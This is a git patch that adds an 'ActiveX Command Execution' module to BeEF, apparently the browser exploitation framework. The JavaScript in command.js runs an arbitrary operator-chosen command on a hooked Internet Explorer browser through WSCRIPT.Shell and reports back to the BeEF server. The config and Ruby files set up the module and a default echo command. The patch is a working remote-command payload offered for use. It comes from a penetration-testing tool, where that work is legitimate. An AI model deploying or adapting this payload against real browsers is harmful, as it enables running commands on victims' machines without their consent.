From 05deaaa8b50217cc6326a9184741251b32229f6c Mon Sep 17 00:00:00 2001
From: bcoles <bcoles@gmail.com>
Date: Fri, 27 Apr 2012 14:15:52 +0930
Subject: [PATCH] Added Module: ActiveX Command Execution

---
 .../activex_command_execution/command.js      | 34 +++++++++++++++++++
 .../activex_command_execution/config.yaml     | 26 ++++++++++++++
 .../activex_command_execution/module.rb       | 28 +++++++++++++++
 3 files changed, 88 insertions(+)
 create mode 100755 modules/exploits/activex_command_execution/command.js
 create mode 100755 modules/exploits/activex_command_execution/config.yaml
 create mode 100755 modules/exploits/activex_command_execution/module.rb

diff --git a/modules/exploits/activex_command_execution/command.js b/modules/exploits/activex_command_execution/command.js
new file mode 100755
index 000000000..c6eeac3d6
--- /dev/null
+++ b/modules/exploits/activex_command_execution/command.js
@@ -0,0 +1,34 @@
+//
+//   Copyright 2012 Wade Alcorn wade@bindshell.net
+//
+//   Licensed under the Apache License, Version 2.0 (the "License");
+//   you may not use this file except in compliance with the License.
+//   You may obtain a copy of the License at
+//
+//       http://www.apache.org/licenses/LICENSE-2.0
+//
+//   Unless required by applicable law or agreed to in writing, software
+//   distributed under the License is distributed on an "AS IS" BASIS,
+//   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+//   See the License for the specific language governing permissions and
+//   limitations under the License.
+//
+beef.execute(function() {
+
+	var cmd = '<%= @cmd.gsub(/'/, "\\'") %>';
+	var result = "command was not sent";
+
+	try {
+		var shell = new ActiveXObject('WSCRIPT.Shell').Run(cmd);
+		if (shell.toString() == 0) {
+			result = "command sent";
+		} else {
+			result = "command failed";
+		}
+	} catch(e) {
+		result = "command failed";
+	}
+
+	beef.net.send('<%= @command_url %>', <%= @command_id %>, 'result='+result);
+
+});
diff --git a/modules/exploits/activex_command_execution/config.yaml b/modules/exploits/activex_command_execution/config.yaml
new file mode 100755
index 000000000..1e0995937
--- /dev/null
+++ b/modules/exploits/activex_command_execution/config.yaml
@@ -0,0 +1,26 @@
+#
+#   Copyright 2012 Wade Alcorn wade@bindshell.net
+#
+#   Licensed under the Apache License, Version 2.0 (the "License");
+#   you may not use this file except in compliance with the License.
+#   You may obtain a copy of the License at
+#
+#       http://www.apache.org/licenses/LICENSE-2.0
+#
+#   Unless required by applicable law or agreed to in writing, software
+#   distributed under the License is distributed on an "AS IS" BASIS,
+#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+#   See the License for the specific language governing permissions and
+#   limitations under the License.
+#
+beef:
+    module:
+        activex_command_execution:
+            enable: true
+            category: "Exploits"
+            name: "ActiveX Command Execution"
+            description: "Execute arbitrary commands using the \"WSCRIPT.Shell\" object. The command response is not returned to BeEF.<br><br>The browser must have \"Initialize and script ActiveX controls not marked as safe for scripting\" enabled."
+            authors: ["bcoles"]
+            target:
+                user_notify: ["IE"]
+                not_working: ["ALL"]
diff --git a/modules/exploits/activex_command_execution/module.rb b/modules/exploits/activex_command_execution/module.rb
new file mode 100755
index 000000000..c8dd70d8c
--- /dev/null
+++ b/modules/exploits/activex_command_execution/module.rb
@@ -0,0 +1,28 @@
+#
+#   Copyright 2012 Wade Alcorn wade@bindshell.net
+#
+#   Licensed under the Apache License, Version 2.0 (the "License");
+#   you may not use this file except in compliance with the License.
+#   You may obtain a copy of the License at
+#
+#       http://www.apache.org/licenses/LICENSE-2.0
+#
+#   Unless required by applicable law or agreed to in writing, software
+#   distributed under the License is distributed on an "AS IS" BASIS,
+#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+#   See the License for the specific language governing permissions and
+#   limitations under the License.
+#
+class Activex_command_execution < BeEF::Core::Command
+
+	def self.options
+		return [
+			{'name' => 'cmd', 'ui_label'=>'Command', 'type' => 'textarea', 'value' =>'cmd.exe /c "echo Hello from BeEF! & pause"', 'width' => '400px', 'height' => '50px'}
+		]
+	end
+
+	def post_execute
+		save({'result' => @datastore['result']})
+	end
+
+end